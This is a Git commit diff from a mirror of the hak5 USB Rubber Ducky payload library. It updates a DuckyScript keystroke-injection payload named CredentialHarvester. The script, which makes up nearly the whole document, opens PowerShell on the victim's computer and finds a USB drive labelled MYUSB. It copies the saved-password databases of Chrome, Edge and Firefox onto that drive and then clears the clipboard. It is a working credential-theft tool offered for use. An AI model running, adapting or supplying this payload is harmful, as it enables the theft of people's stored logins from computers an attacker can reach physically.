hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update Payload.txt

pull/452/head
Mark 2024-05-31 09:31:35 -04:00 committed by GitHub
parent 81260982f1
commit f843113663
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 17 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
payloads/library/exfiltration/CredentialHarvester/Payload.txt
View File

@ -15,41 +15,46 @@ DELAY 500
STRING powershell
DELAY 500
ENTER
DELAY 1000
DELAY 1500
REM Check if the USB drive exists
STRING $usbDrive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'MYUSB' } | Select -ExpandProperty DriveLetter;
STRING $usbDrive = Get-WmiObject Win32_Volume ^| Where-Object { $_.Label -eq 'MYUSB' } ^| Select-Object -ExpandProperty DriveLetter;
ENTER
DELAY 500
STRING if ($usbDrive -ne $null) {
ENTER
DELAY 500
STRING cd $usbDrive;
STRING cd $usbDrive
ENTER
DELAY 500
STRING mkdir BrowserData;
STRING mkdir BrowserData
ENTER
DELAY 500
STRING cd BrowserData;
STRING cd BrowserData
ENTER
DELAY 500
REM Copy Chrome Login Data to USB
STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data";
STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData"; }
STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"
ENTER
STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData" }
ENTER
DELAY 500
REM Copy Firefox Login Data to USB
STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\";
STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData"; }
STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\"
ENTER
STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData" }
ENTER
DELAY 500
REM Copy Edge Login Data to USB
STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data";
STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData"; }
STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data"
ENTER
STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData" }
ENTER
DELAY 500
STRING }
ENTER
DELAY 500
REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on target PC)
STRING echo off | clip
STRING echo off ^| clip
ENTER
DELAY 500
REM Close PowerShell